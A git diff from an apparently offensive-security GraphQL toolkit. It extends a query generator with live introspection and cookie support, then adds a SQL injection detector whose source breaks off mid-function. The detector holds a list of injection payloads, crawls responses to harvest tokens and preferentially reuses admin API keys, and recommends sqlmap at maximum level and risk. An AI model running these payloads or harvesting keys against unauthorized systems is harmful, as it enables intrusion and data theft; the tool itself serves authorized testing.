print_banner(): print(f""" {YELLOW} @@ -21,19 +30,19 @@ def print_banner(): ╚██████╔╝╚██████╔╝███████╗██║ ╚████║ ╚══▀▀═╝ ╚═════╝ ╚══════╝╚═╝ ╚═══╝ v1.0 {RESET} - + {CYAN}made by gitblanc — https://github.com/gitblanc/QGen{RESET} - + """) - + def load_introspection(): while True: path = input("Enter introspection JSON file path: ").strip() - + if not os.path.exists(path): print("❌ File not found. Try again.\n") continue - + try: with open(path, "r", encoding="utf-8") as f: data = json.load(f) @@ -41,145 +50,375 @@ def load_introspection(): return data except Exception as e: print(f"❌ Error reading JSON: {e}\n") - - -# Extract query fields + +# Introspection query used when obtaining schema from endpoint. +# NOTE: includes inputFields for input objects so we can expand them inline. +INTROSPECTION_QUERY = """ +query IntrospectionQuery { + __schema { + queryType { name } + mutationType { name } + types { + kind + name + fields(includeDeprecated: true) { + name + args { + name + type { kind name ofType { kind name ofType { kind name } } } + } + type { kind name ofType { kind name } } + } + inputFields { + name + description + defaultValue + type { kind name ofType { kind name ofType { kind name } } } + } + enumValues { + name + } + } + } +} +""" + +def parse_header_list(headers_list: List[str]) -> Dict[str, str]: + """ + Convert list of 'Name: Value' strings to a dict (last wins for duplicates). + """ + hdrs: Dict[str, str] = {} + for h in headers_list or []: + if ":" not in h: + print(f"⚠️ Ignoring malformed header (expected 'Name: Value'): {h}") + continue + name, value = h.split(":", 1) + hdrs[name.strip()] = value.strip() + return hdrs + +def perform_introspection_request(url: str, headers: Dict[str, str], timeout: int = 15) -> Optional[Dict[str, Any]]: + """ + Perform a POST request to the GraphQL endpoint with the introspection query. + Returns parsed JSON on success, or None on failure. + """ + if requests is None: + print("❌ The 'requests' library is required for automatic introspection. Install with: pip install requests") + return None + + try: + resp = requests.post(url, headers=headers, json={"query": INTROSPECTION_QUERY}, timeout=timeout) + except requests.exceptions.RequestException as e: + print(f"❌ HTTP error while requesting introspection: {e}") + return None + + try: + data = resp.json() + except Exception as e: + print(f"❌ Response is not valid JSON: {e}") + return None + + if (isinstance(data, dict) and + ((data.get("data") and isinstance(data["data"], dict) and "__schema" in data["data"]) or ("__schema" in data))): + return data + + print("❌ Introspection response does not contain '__schema' (not a valid GraphQL introspection).") + return None + +def save_introspection_file(data: Dict[str, Any], path: str = "introspection_schema.json") -> None: + try: + with open(path, "w", encoding="utf-8") as fh: + json.dump(data, fh, indent=2, ensure_ascii=False) + print(f"✅ Introspection saved to: {path}") + except Exception as e: + print(f"⚠️ Failed to save introspection to {path}: {e}") + +# Extract query and mutation fields def extract_graphql_queries(introspection): try: types = introspection["data"]["__schema"]["types"] except Exception: return [] - - query_type_name = introspection["data"]["__schema"]["queryType"]["name"] - query_type = next((t for t in types if t.get("name") == query_type_name), None) - - if not query_type: - return [] - - return query_type.get("fields", []) - - + + methods = [] + + # Extract query fields (if present) + query_type = introspection["data"]["__schema"].get("queryType") + query_type_name = query_type.get("name") if isinstance(query_type, dict) else query_type + if query_type_name: + qtype = next((t for t in types if t.get("name") == query_type_name), None) + if qtype and "fields" in qtype: + for f in qtype["fields"]: + f_copy = f.copy() + f_copy["_root"] = "query" + methods.append(f_copy) + + # Extract mutation fields (if present) + mutation_type = introspection["data"]["__schema"].get("mutationType") + mutation_type_name = mutation_type.get("name") if isinstance(mutation_type, dict) else mutation_type + if mutation_type_name: + mtype = next((t for t in types if t.get("name") == mutation_type_name), None) + if mtype and "fields" in mtype: + for f in mtype["fields"]: + f_copy = f.copy() + f_copy["_root"] = "mutation" + methods.append(f_copy) + + return methods + + # Follow NON_NULL / LIST / etc. def resolve_type(t): - while t.get("ofType") is not None: + # t is expected to be a dict with possible 'ofType' recursing + while isinstance(t, dict) and t.get("ofType") is not None: t = t["ofType"] return t - - -# Recursively build full field tree for the query + +# Recursively build full field tree for the query (response shape) def build_field_tree(field_type, types, depth=0, visited=None): if visited is None: visited = set() - + field_type = resolve_type(field_type) - - if field_type["name"] in visited: + + # Some types might not have a name (e.g., scalars) - guard + name = field_type.get("name") + if name and name in visited: return "" - - visited.add(field_type["name"]) - - if field_type["kind"] != "OBJECT": + + if name: + visited.add(name) + + if field_type.get("kind") != "OBJECT": return "" - + obj = next((t for t in types if t["name"] == field_type["name"]), None) if not obj or "fields" not in obj: return "" - + indent = " " * depth result = "" - + for f in obj["fields"]: f_type = resolve_type(f["type"]) f_name = f["name"] - - if f_type["kind"] == "OBJECT": + + if f_type.get("kind") == "OBJECT": sub = build_field_tree(f["type"], types, depth + 1, visited.copy()) result += f"{indent}{f_name} {{\n{sub}{indent}}}\n" else: result += f"{indent}{f_name}\n" - + return result - + def save_query_to_file(method_name, query_text): # Ensure directory exists os.makedirs("queries", exist_ok=True) - + path = f"queries/{method_name}.txt" - + try: with open(path, "w", encoding="utf-8") as f: f.write(query_text) print(f"📁 Query saved to: {path}\n") except Exception as e: print(f"❌ Error saving query: {e}") - - + def stringify_type(t): """Convert GraphQL type tree into a printable type string.""" - if t["kind"] == "NON_NULL": + if not isinstance(t, dict): + return "Unknown" + if t.get("kind") == "NON_NULL": return f"{stringify_type(t['ofType'])}!" - elif t["kind"] == "LIST": + elif t.get("kind") == "LIST": return f"[{stringify_type(t['ofType'])}]" else: - return t["name"] - + return t.get("name", "Unknown") + +# Helpers to build inline input objects with example values +def build_input_object(type_ref, types, depth=0, visited=None): + """ + Given a type reference (dict with kind/name/ofType), find the corresponding INPUT_OBJECT + type definition in 'types' and return a formatted inline object string like: + { username: "user", password: "pass" } + """ + if visited is None: + visited = set() + + resolved = resolve_type(type_ref) + type_name = resolved.get("name") + if not type_name: + return "{}" + + if type_name in visited: + return "{}" + visited.add(type_name) + + type_obj = next((t for t in types if t.get("name") == type_name), None) + if not type_obj: + return "{}" + + input_fields = type_obj.get("inputFields") or [] + indent = " " * depth + inner_indent = " " * (depth + 1) + + parts = [] + for f in input_fields: + fname = f["name"] + # If defaultValue is provided in introspection, use it + if f.get("defaultValue") is not None: + val = f["defaultValue"] + # defaultValue in introspection is a string representation; leave as-is + parts.append(f"{inner_indent}{fname}: {val}") + continue + + val = format_input_value(f["type"], types, fname, depth + 1, visited.copy()) + parts.append(f"{inner_indent}{fname}: {val}") + + if not parts: + return "{}" + + if depth == 0: + # single-line compact for top-level input + inner = ", ".join(p.strip() for p in parts) + return "{ " + inner + " }" + else: + # multi-line with indentation + body = "\n".join(parts) + return "{\n" + body + f"\n{indent}}}" + +def format_input_value(type_ref, types, field_name=None, depth=0, visited=None): + """ + Return a string representing a sample value for the given type reference. + Strings are quoted, booleans and numbers are unquoted, lists are bracketed, objects expanded. + """ + t = type_ref + # Handle NON_NULL / LIST wrappers + if not isinstance(t, dict): + return "\"example\"" + + if t.get("kind") == "NON_NULL": + return format_input_value(t["ofType"], types, field_name, depth, visited) + if t.get("kind") == "LIST": + # produce a single-element list + inner = format_input_value(t["ofType"], types, field_name, depth + 1, visited) + return f"[{inner}]" + + # Now resolved scalar/enum/input object/type + kind = t.get("kind") + name = t.get("name", "") + + # Primitive scalars + if kind == "SCALAR" or name in ("String", "ID", ""): + # sensible defaults by common field name + if field_name: + lname = field_name.lower() + if "user" in lname and "name" in lname: + return f"\"{field_name}_example\"" + if "name" == lname: + return f"\"{field_name}_example\"" + if "pass" in lname: + return "\"password123\"" + if "email" in lname: + return f"\"{field_name}@example.com\"" + if "msg" in lname or "message" in lname: + return f"\"{field_name}_example\"" + if "role" in lname: + return "\"user\"" + # default string + return "\"example\"" + if name in ("Int", "Float"): + return "0" + if name == "Boolean": + return "false" + + # Enums: try to pick first enum value if present + if kind == "ENUM" or (name and any(ti.get("name") == name and ti.get("enumValues") for ti in types)): + t_obj = next((ti for ti in types if ti.get("name") == name), None) + if t_obj: + enum_vals = t_obj.get("enumValues") or [] + if enum_vals: + first = enum_vals[0].get("name") + # enums are unquoted or sometimes unquoted values -> return first as bare token + return first if first is not None else "\"ENUM_VALUE\"" + return "\"ENUM_VALUE\"" + + # Input objects -> expand recursively + if kind == "INPUT_OBJECT" or (name and any(ti.get("name") == name and ti.get("inputFields") for ti in types)): + return build_input_object(t, types, depth, visited) + + # Fallback to string + return "\"example\"" + def generate_full_query(method_field, introspection): types = introspection["data"]["__schema"]["types"] - + # ---- Extract arguments ---- - args = method_field.get("args", []) + args = method_field.get("args", []) or [] variables = [] call_args = [] - + + # Decide per-arg whether to inline (INPUT_OBJECT) or use variable for a in args: var_name = a["name"] - var_type = stringify_type(a["type"]) - variables.append(f"${var_name}: {var_type}") - call_args.append(f"{var_name}: ${var_name}") - + resolved = resolve_type(a["type"]) + kind = resolved.get("kind") + name = resolved.get("name") + + if kind == "INPUT_OBJECT" or (name and any(t.get("name") == name and t.get("inputFields") for t in types)): + # inline expanded object + inline_obj = build_input_object(a["type"], types) + call_args.append(f"{var_name}: {inline_obj}") + else: + # keep as variable + var_type = stringify_type(a["type"]) + variables.append(f"${var_name}: {var_type}") + call_args.append(f"{var_name}: ${var_name}") + # Build signature variables_str = f"({', '.join(variables)})" if variables else "" call_args_str = f"({', '.join(call_args)})" if call_args else "" - + # ---- Build field tree ---- root_type = method_field["type"] fields_tree = build_field_tree(root_type, types, depth=2) - + + # Determine operation type (query or mutation) + operation = method_field.get("_root", "query") + # ---- Build final query ---- return f""" -query {method_field['name']}{variables_str} {{ +{operation} {method_field['name']}{variables_str} {{ {method_field['name']}{call_args_str} {{ {fields_tree} }} }} """.rstrip() - - + + def print_help(): print(""" Available commands: help - Show this help message listMethods - List all available GraphQL methods - use - Select a method - genQuery - Generate a full GraphQL query with all fields + use - Select a method and immediately generate its full query exit - Exit the application """) - - + + def interactive_console(methods, introspection): selected_method = None - + print("Type 'help' to see available commands.\n") - + while True: raw_cmd = input(f"{RED}Qgen ${RESET} ").strip() - + # --- PIPE SUPPORT --- if "|" in raw_cmd: left, _, right = raw_cmd.partition("|") cmd = left.strip() pipe_cmd = right.strip() - + if pipe_cmd.startswith("grep"): _, _, grep_text = pipe_cmd.partition("grep") grep_text = grep_text.strip().lower() @@ -190,14 +429,22 @@ def interactive_console(methods, introspection): cmd = raw_cmd pipe_cmd = None # --------------------- - + + # Allow shorthand: bare number or exact method name selects the method + # but don't override primary commands + if not cmd.startswith("use ") and cmd not in ("help", "listMethods", "exit", ""): + if cmd.isdigit(): + cmd = f"use {cmd}" + else: + if any(m["name"] == cmd for m in methods): + cmd = f"use {cmd}" + # MAIN COMMAND HANDLING if cmd == "help": output = """Available commands: help - Show this help message listMethods - List all available GraphQL methods - use - Select a method - genQuery - Generate a full GraphQL query with all fields + use - Select a method and immediately generate its full query exit - Exit the application """ if pipe_cmd: @@ -205,22 +452,26 @@ def interactive_console(methods, introspection): line for line in output.splitlines() if grep_text in line.lower() ) print(output) - + elif cmd == "listMethods": - lines = [f" [{i}] {m['name']}" for i, m in enumerate(methods, start=1)] - + lines = [] + for i, m in enumerate(methods, start=1): + root = m.get("_root", "query") + prefix = "Q" if root == "query" else "M" + lines.append(f" [{i}] ({prefix}) {m['name']}") + if pipe_cmd: lines = [l for l in lines if grep_text in l.lower()] - + print("\n📌 Available methods:") for line in lines: print(line) print() - + elif cmd.startswith("use "): _, _, value = cmd.partition(" ") value = value.strip() - + if value.isdigit(): idx = int(value) - 1 if 0 <= idx < len(methods): @@ -228,6 +479,7 @@ def interactive_console(methods, introspection): print(f"✔ Selected method: {selected_method['name']}\n") else: print("❌ Invalid method number.\n") + continue else: match = next((m for m in methods if m["name"] == value), None) if match: @@ -235,41 +487,61 @@ def interactive_console(methods, introspection): print(f"✔ Selected method: {value}\n") else: print("❌ Method not found.\n") - - elif cmd == "genQuery": - if not selected_method: - print("❌ Select a method first with: use \n") - else: + continue + + # Unified behavior: immediately generate the full query for the selected method + try: query = generate_full_query(selected_method, introspection) print("\n----------------------------------------") print(f"{BLUE}{query}{RESET}") print("----------------------------------------\n") - + # Save the query automatically save_query_to_file(selected_method["name"], query) - + except Exception as e: + print(f"❌ Error generating query: {e}\n") + elif cmd == "exit": print("👋 Exiting...") break - + else: + if cmd == "": + # ignore empty input + continue print("❌ Unknown command. Type 'help' for the command list.\n") - - + + def main(): print_banner() print("=== GraphQL Interactive CLI (extruder) ===\n") - + parser = argparse.ArgumentParser(description="GraphQL Introspection CLI Extruder") parser.add_argument( "--introspection", type=str, help="Path to introspection JSON file" ) - + # New: endpoint URL to query introspection if --introspection is omitted + parser.add_argument( + "--url", + type=str, + help="GraphQL endpoint URL to perform introspection automatically if --introspection is not provided" + ) + # Support repeated headers -H "Name: Value" + parser.add_argument("-H", "--header", action="append", default=[], help="Additional HTTP header to include when performing automatic introspection. Format: 'Name: Value'") + # Cookie file support (for automatic introspection) + parser.add_argument("--cookie", help="File containing cookie in plain text (one line) to use when performing automatic introspection") + # Saving option for automatic introspection + parser.add_argument("--save-introspection", dest="save_introspection", action="store_true", help="Save automatic introspection to introspection_schema.json") + parser.add_argument("--no-save-introspection", dest="save_introspection", action="store_false", help="Do not save automatic introspection to disk") + parser.set_defaults(save_introspection=True) + args = parser.parse_args() - - # If provided via CLI, try to load it directly + + introspection = None + + # If provided via CLI file, try to load it directly if args.introspection: if os.path.exists(args.introspection): try: @@ -283,17 +555,44 @@ def main(): print("❌ File path passed to --introspection does not exist.\n") return else: - # Fall back to interactive prompt - introspection = load_introspection() - + # Attempt to perform automatic introspection if --url provided + if args.url: + # Build headers: Content-Type + user provided headers + cookie (if provided) + headers = {"Content-Type": "application/json"} + extra_headers = parse_header_list(args.header) + if args.cookie: + if not os.path.exists(args.cookie): + print(f"❌ Cookie file not found: {args.cookie}\n") + return + with open(args.cookie, "r", encoding="utf-8") as f: + cookie_value = f.read().strip() + # Respect explicit Cookie header if user provided it via -H + if "Cookie" not in extra_headers: + extra_headers["Cookie"] = cookie_value + headers.update(extra_headers) + + print(f"[*] No --introspection provided; performing introspection query against {args.url} ...") + result = perform_introspection_request(args.url, headers) + if result is None: + print("❌ Could not obtain introspection from endpoint. Falling back to interactive prompt.\n") + introspection = load_introspection() + else: + introspection = result + print("✅ Introspection obtained from endpoint.\n") + if args.save_introspection: + save_introspection_file(introspection, path="introspection_schema.json") + else: + # Fall back to interactive prompt if no --url supplied + introspection = load_introspection() + methods = extract_graphql_queries(introspection) - + if not methods: print("❌ No GraphQL methods found in the introspection.") return - + interactive_console(methods, introspection) - - + + if __name__ == "__main__": main() diff --git a/sqli/README.md b/sqli/README.md new file mode 100644 index 0000000..ef304b9 --- /dev/null +++ b/sqli/README.md @@ -0,0 +1,146 @@ +# GraphQL SQLi Detector (sqli_detector.py) + +A compact GraphQL SQL injection mini-detector (Python). This script performs GraphQL introspection, attempts a set of SQLi-like payloads against candidate string arguments, and writes reproducible marker `.http` files for use with sqlmap. The detector includes heuristics to reduce false positives and attempts to populate required arguments using values extracted from simple queries or an optional limited crawler. It also prioritizes discovered admin API keys when filling key-like arguments to increase coverage of privileged code paths. + +--- + +## Key capabilities +- Performs GraphQL introspection to discover `Query` fields and their arguments. +- Extracts real values from simple queries (tokens, keys, names) to use as baseline or to fill required arguments. +- Optional, opt-in crawling to follow relationships and collect more candidate inputs (Relay-style pagination attempts included). +- Decodes common GraphQL global IDs encoded as base64 and adds decoded IDs as candidates. +- Tests string-like arguments with a curated set of SQLi payloads. +- Detects SQL error messages included in GraphQL `errors`. +- Detects response differences (baseline vs attack), `NULL`-on-attack, and other signals. +- Writes reproducible `.http` marker files in `repro-payloads/` where the vulnerable value is replaced by `*`. +- Produces a recommended sqlmap command for confirmed findings. +- Prioritizes API keys discovered with role `admin` when filling key-like arguments (e.g. `apiKey`, `key`, `token`), increasing the chance to reach privileged code paths. +- Uses confirmation rules to reduce false positives (reports only when evidence is strong). + +--- + +## What the detector does (high-level) +1. Runs GraphQL introspection to obtain types and `Query` fields. +2. Extracts values from simple, argument-less queries (seed phase) and, optionally, runs a limited BFS-style crawl: + - For seed fields it tries several query shapes (simple selection, Relay `first:N` with `edges.node`, and `first:N` without edges) to coax items out of paginated endpoints. + - Decodes base64/global IDs and adds decoded IDs (and `Id` keys) to candidate pools. + - Follows id-like args using extracted IDs to expand discovery. +3. For each field with string-like arguments: + - Builds a working baseline by trying a few combinations of plausible values for other args. + - Sends curated SQLi-like payloads in the target argument. + - Skips GraphQL syntax errors (not SQLi). + - Detects SQL error messages, response diffs, and null-on-attack. + - If a required argument is missing, attempts to fill it from extracted values (with a simple name-match fallback). +4. For confirmed signals, writes a `.http` marker file with the attack request (attacked value replaced by `*`) and suggests a sqlmap command. + +--- + +## Usage +Basic usage: +```bash +python sqli_detector.py [headers_json] +``` + +Examples: +- Quick run without crawling: + ```bash + python sqli_detector.py https://example.com/graphql + ``` +- Run with authorization header (no crawl): + ```bash + python sqli_detector.py https://example.com/graphql '{"Authorization":"Bearer TOKEN"}' + ``` +- Run with crawling (authorized audits only): + ```bash + python sqli_detector.py https://example.com/graphql '{"Authorization":"Bearer TOKEN"}' --crawl --crawl-depth 2 --max-requests 200 --max-items 10 --crawl-delay 0.1 --verbose + ``` + +--- + +## CLI flags (summary) +- `` (positional) + GraphQL endpoint URL. + +- `[headers_json]` (positional, optional) + JSON string or simple "Key: Value" pairs (e.g. `'{"Authorization":"Bearer TOKEN"}'`). + +- `--crawl` + Enable limited crawling to extract outputs and reuse them as inputs. Opt-in because crawling increases requests. + +- `--crawl-depth N` (default: 2) + Maximum crawl depth (BFS levels). + +- `--max-requests N` (default: 250) + Maximum number of requests allowed during crawling. + +- `--max-items N` (default: 10) + Max items per list to inspect when extracting values. + +- `--crawl-delay FLOAT` (default: 0.0) + Delay in seconds between requests during crawling. + +- `--verbose` + Print queries and additional debug information (useful to inspect what the crawler is calling and the responses). + +--- + +## Output +- Human-readable findings printed to stdout (colored if colorama is available). +- Repro marker files written to `repro-payloads/` when findings are confirmed. Filenames include a sanitized field/arg name, timestamp, and short hash to avoid collisions. +- Each finding contains: + - field and argument name + - arguments used for the attack + - evidence (error message or description) + - marker request path + - recommended sqlmap command: + ``` + sqlmap --level 5 --risk 3 -r '' -p "JSON[query]" --batch --skip-urlencode --random-agent + ``` + +--- + +## Marker (.http) files +- Marker files are full HTTP POST requests that include headers and a JSON body where the vulnerable value has been replaced by `*`. Example: + ``` + POST /graphql HTTP/1.1 + Host: example.com + Content-Type: application/json + Authorization: Bearer TOKEN + + {"query":"query { user(id: \"123\") { email } }"} + ``` +- The target value in the JSON is substituted with `*` so sqlmap can inject into `JSON[query]` using `-r ` and `-p "JSON[query]"`. + +--- + +## Detection heuristics / confirmation rules +To reduce noisy false positives the detector reports a parameter only when one or more of the following hold: +- A clear SQL error is present in GraphQL `errors` (matches DB error signatures), OR +- Two or more distinct payloads produce evidence, OR +- A combination of strong signals (e.g., RESPONSE_DIFF + NULL_ON_ATTACK), OR +- A `NULL_ON_ATTACK` signal confirmed against a meaningful baseline. + +Signals checked: +- SQL error messages in `errors` (MySQL/Postgres/SQLite mentions, syntax errors, etc.) +- Response differences between baseline and attacked request +- `null` appearing in the attack response while baseline returned data +- Differences in a simple `__typename` baseline vs attack (quick sanity check) + +--- + +## Limitations +- Small, curated payload set — not exhaustive. Use sqlmap (the generated markers) for deeper automated testing. +- Tests are sequential; there is no built-in concurrency/worker pool. For large schemas consider extending to multiple workers. +- Crawling can reveal or store sensitive data. Use crawling only on authorized targets and treat `repro-payloads/` as sensitive output. +- Time-based blind SQLi is not tested by default. Add time-based payloads and response timing checks to detect blind techniques. +- If GraphQL introspection is disabled, discovery will fail; provide schema manually or use alternative enumeration techniques. +- Complex input objects, deeply nested relationships, or custom auth flows may need custom logic to populate arguments successfully. + +--- + +## Suggested next improvements +- Add flags for: + - concurrency / workers + - custom payload lists and strategies +- Expand payloads to include boolean- and time-based techniques (blind SQLi). +- Add more robust heuristics (email/UUID/hash detection, fuzzy matches). diff --git a/sqli/requirements.txt b/sqli/requirements.txt new file mode 100644 index 0000000..0cf5745 --- /dev/null +++ b/sqli/requirements.txt @@ -0,0 +1,2 @@ +requests>=2.28.0 +colorama>=0.4.0 diff --git a/sqli/sqli_detector.py b/sqli/sqli_detector.py new file mode 100644 index 0000000..b92accc --- /dev/null +++ b/sqli/sqli_detector.py @@ -0,0 +1,1160 @@ +#!/usr/bin/env python3 +from __future__ import annotations +import re +import json +import base64 +import hashlib +import argparse +import time +import shutil +from datetime import datetime, timezone +from typing import Any, Dict, List, Optional, Set, Tuple +from urllib.parse import urlparse +from pathlib import Path +from itertools import product + +import requests +try: + from colorama import init as colorama_init, Fore, Style + colorama_init(autoreset=True) +except Exception: + class _Dummy: + def __getattr__(self, name): return "" + Fore = Style = _Dummy() + +INTROSPECTION_QUERY = """ +query IntrospectionQuery { + __schema { + types { + kind + name + fields { + name + args { + name + type { + kind + name + ofType { + kind + name + ofType { + kind + name + } + } + } + } + type { + kind + name + ofType { + kind + name + ofType { + kind + name + } + } + } + } + } + } +} +""" + +PAYLOADS = [ + '" OR "1"="1', + "' OR '1'='1", + "' OR 1=1--", + "admin' -- ", + "x' UNION SELECT NULL-- ", + '"\' OR 1=1 -- ', + "'", + "admin'/*", + 'admin"/*', +] + +SQL_ERROR_SIGS = [ + re.compile(r"SQL syntax", re.I), + re.compile(r"syntax error", re.I), + re.compile(r"unterminated quoted string", re.I), + re.compile(r"mysql", re.I), + re.compile(r"postgres", re.I), + re.compile(r"sqlite", re.I), + re.compile(r"sqlstate", re.I), + re.compile(r"you have an error in your sql syntax", re.I), + re.compile(r"pg_query\(", re.I), + re.compile(r"pymysql", re.I), + re.compile(r"psycopg", re.I), + re.compile(r"mariadb", re.I), +] + +TIMEOUT = 20 +REPRO_DIR = "repro-payloads" +INDEX_FILE = "index.json" +EVIDENCE_MAX_CHARS = 80 # max chars to display for evidence in console + +# -------------------- Utilities ------------------------------------------- + +def try_parse_headers(h: Optional[str]) -> Dict[str, str]: + if not h: + return {} + try: + parsed = json.loads(h) + if isinstance(parsed, dict): + return parsed + if isinstance(parsed, list): + res = {} + for item in parsed: + if isinstance(item, dict): + res.update(item) + return res + except Exception: + pass + headers = {} + for part in re.split(r";|,", h): + part = part.strip() + if not part: + continue + if ":" in part: + k, v = part.split(":", 1) + headers[k.strip()] = v.strip() + return headers + +def post_graphql(endpoint: str, headers: Dict[str, str], payload: Dict[str, Any], verbose: bool = False) -> Dict[str, Any]: + h = {"Content-Type": "application/json"} + h.update(headers or {}) + if verbose: + q = payload.get("query") if isinstance(payload, dict) else str(payload) + print(Fore.BLUE + Style.DIM + "[>] POST " + endpoint + " BODY: " + Style.RESET_ALL + (q[:800] + "..." if len(q) > 800 else q)) + try: + r = requests.post(endpoint, json=payload, headers=h, timeout=TIMEOUT) + try: + data = r.json() + except Exception: + data = {"_raw_text": r.text} + return {"status": r.status_code, "data": data} + except requests.RequestException as e: + return {"status": 0, "data": {"errors": [{"message": str(e)}]}} + +def extract_named_type(t: Optional[Dict[str, Any]]) -> Optional[str]: + if not t: + return None + if t.get("name"): + return t.get("name") + if t.get("ofType"): + return extract_named_type(t.get("ofType")) + return None + +def is_string_type(arg_type_name: Optional[str]) -> bool: + if not arg_type_name: + return False + n = arg_type_name.lower() + return n in ("string", "id", "varchar", "text") + +def find_type_definition(schema_types: List[Dict[str, Any]], name: Optional[str]) -> Optional[Dict[str, Any]]: + if not name: + return None + for t in schema_types: + if t.get("name") == name: + return t + return None + +def pick_scalar_field_for_type(type_def: Optional[Dict[str, Any]], schema_types: List[Dict[str, Any]]) -> Optional[str]: + if not type_def or not type_def.get("fields"): + return None + for f in type_def.get("fields", []): + tname = extract_named_type(f.get("type")) + if not tname: + continue + low = tname.lower() + if low in ("string", "int", "float", "boolean", "id", "integer"): + return f.get("name") + td = find_type_definition(schema_types, tname) + if not td or not td.get("fields"): + return f.get("name") + return None + +def normalize_resp(data: Any) -> str: + try: + return json.dumps(data, sort_keys=True, ensure_ascii=False) + except Exception: + return str(data) + +def truncate_str(s: str, n: int = 180) -> str: + if s is None: + return "" + s = str(s) + return s if len(s) <= n else s[:n] + "..." + +def build_query(field_name: str, args_dict: Dict[str, str], selection: Optional[str]) -> Dict[str, Any]: + if args_dict: + args_str = ", ".join([f'{k}: {json.dumps(v)}' for k, v in args_dict.items()]) + if selection: + q = f'query {{ {field_name}({args_str}) {{ {selection} }} }}' + else: + q = f'query {{ {field_name}({args_str}) }}' + else: + if selection: + q = f'query {{ {field_name} {{ {selection} }} }}' + else: + q = f'query {{ {field_name} }}' + return {"query": q} + +def _sanitize_name(s: str) -> str: + return re.sub(r"[^\w\-]+", "_", s)[:64] + +def _write_raw_http(endpoint: str, headers: Dict[str, str], body_json: Dict[str, Any], fname: str) -> str: + repo_root = Path.cwd() + repro_dir = repo_root / REPRO_DIR + repro_dir.mkdir(parents=True, exist_ok=True) + parsed = urlparse(endpoint) + path = parsed.path or "/" + if parsed.query: + path = path + "?" + parsed.query + host_header = parsed.netloc + hdrs = {} + hdrs["Host"] = host_header + for k, v in (headers or {}).items(): + if k.lower() == "host": + hdrs["Host"] = v + else: + hdrs[k] = v + if not any(k.lower() == "content-type" for k in hdrs): + hdrs["Content-Type"] = "application/json" + body_str = json.dumps(body_json, ensure_ascii=False) + fpath = repro_dir / fname + lines = [] + lines.append(f"POST {path} HTTP/1.1") + for k, v in hdrs.items(): + lines.append(f"{k}: {v}") + lines.append("") + lines.append(body_str) + content = "\r\n".join(lines) + "\r\n" + with open(fpath, "w", encoding="utf-8") as fh: + fh.write(content) + return str(fpath) + +def _read_index() -> Dict[str, Any]: + idx_path = Path(REPRO_DIR) / INDEX_FILE + if not idx_path.exists(): + return {} + try: + with open(idx_path, "r", encoding="utf-8") as fh: + return json.load(fh) + except Exception: + return {} + +def _write_index(idx: Dict[str, Any]) -> None: + idx_path = Path(REPRO_DIR) + idx_path.mkdir(parents=True, exist_ok=True) + with open(idx_path / INDEX_FILE, "w", encoding="utf-8") as fh: + json.dump(idx, fh, ensure_ascii=False, indent=2) + +# -------------------- Crawling / extraction -------------------------------- + +def seed_field_queries(field: Dict[str, Any], types: List[Dict[str, Any]], page_sizes: List[int], max_items: int) -> List[str]: + fname = field.get("name") + return_type_name = extract_named_type(field.get("type")) + ret_def = find_type_definition(types, return_type_name) + scalars = [] + if ret_def and ret_def.get("fields"): + for f in ret_def.get("fields", [])[:20]: + fname_f = f.get("name") + if fname_f and not fname_f.startswith("__"): + scalars.append(fname_f) + if not scalars: + scalars = ["__typename"] + selection = " ".join(scalars[:8]) + queries = [] + queries.append(f'query {{ {fname} {{ {selection} }} }}') + for n in page_sizes: + queries.append(f'query {{ {fname}(first: {n}) {{ edges {{ node {{ {selection} }} }} }} }}') + for n in page_sizes: + queries.append(f'query {{ {fname}(first: {n}) {{ {selection} }} }}') + return queries + +def get_field_from_response(resp_data: Any, field_name: str) -> Any: + if not resp_data: + return None + if isinstance(resp_data, dict): + if "data" in resp_data and isinstance(resp_data["data"], dict): + return resp_data["data"].get(field_name) + if field_name in resp_data: + return resp_data.get(field_name) + return None + +def _pretty_print_extracted_values(extracted_values: Dict[str, Set[str]], key_roles: Dict[str, str], max_per_key: int = 6): + if not extracted_values and not key_roles: + print(Fore.YELLOW + "[*] No extracted values found.") + return + print(Fore.CYAN + "[*] Extracted values (sample):") + if key_roles: + print(Fore.MAGENTA + " Key -> role mappings:") + for k, r in list(key_roles.items())[:10]: + print(Fore.MAGENTA + f" {k} -> {r}") + if extracted_values: + print(Fore.CYAN + " Field -> values:") + for key in sorted(extracted_values.keys()): + vals = list(extracted_values[key]) + sample = vals[:max_per_key] + print(Fore.CYAN + f" {key}: " + Fore.WHITE + f"{json.dumps(sample, ensure_ascii=False)}" + Style.RESET_ALL) + +def try_decode_global_id(val: str) -> Optional[Tuple[str, str]]: + if not isinstance(val, str): + return None + if len(val) < 8: + return None + if not re.fullmatch(r'[A-Za-z0-9+/=]+', val): + return None + try: + decoded = base64.b64decode(val + '===').decode('utf-8', errors='ignore') + except Exception: + return None + if ':' in decoded: + parts = decoded.split(':', 1) + return parts[0].strip(), parts[1].strip() + return None + +def simple_name_match_values(arg_name: str, extracted_values: Dict[str, Set[str]]) -> List[str]: + an = (arg_name or "").lower() + if an in extracted_values: + return list(extracted_values[an])[:5] + candidates = [] + for k, vals in extracted_values.items(): + kn = k.lower() + if an in kn or kn in an: + candidates.extend(list(vals)[:3]) + if 'key' in an and 'key' in extracted_values: + candidates = list(extracted_values['key'])[:5] + candidates + if 'token' in an and 'token' in extracted_values: + candidates = list(extracted_values['token'])[:5] + candidates + seen = set() + res = [] + for v in candidates: + if v not in seen: + res.append(v) + seen.add(v) + if len(res) >= 5: + break + return res + +def crawl_and_extract_values(endpoint: str, + headers: Dict[str, str], + query_fields: List[Dict[str, Any]], + types: List[Dict[str, Any]], + max_depth: int = 2, + max_requests: int = 250, + max_items_per_list: int = 10, + delay: float = 0.0, + verbose: bool = False) -> Tuple[Dict[str, Set[str]], Dict[str, str]]: + """ + Crawl simple query fields to extract string values to reuse as candidates for arguments. + Returns (extracted_values, key_roles). + """ + print(Fore.CYAN + "[*] Crawling schema to extract values for candidate inputs...") + extracted_values: Dict[str, Set[str]] = {} + key_roles: Dict[str, str] = {} + requests_made = 0 + visited: Set[Tuple[str, str]] = set() + page_sizes = [10, 50, 100] + + def collect(obj: Any, prefix: Optional[str] = None): + if isinstance(obj, dict): + if 'edges' in obj and isinstance(obj['edges'], list): + for e in obj['edges'][:max_items_per_list]: + if isinstance(e, dict) and 'node' in e: + collect(e['node'], prefix) + return + for k, v in obj.items(): + if k.startswith("__"): + continue + if isinstance(v, str) and v: + extracted_values.setdefault(k, set()).add(v) + elif isinstance(v, list): + for it in v[:max_items_per_list]: + collect(it, prefix=k) + elif isinstance(v, dict): + collect(v, prefix=k) + elif isinstance(obj, list): + for it in obj[:max_items_per_list]: + collect(it, prefix=prefix) + + for field in 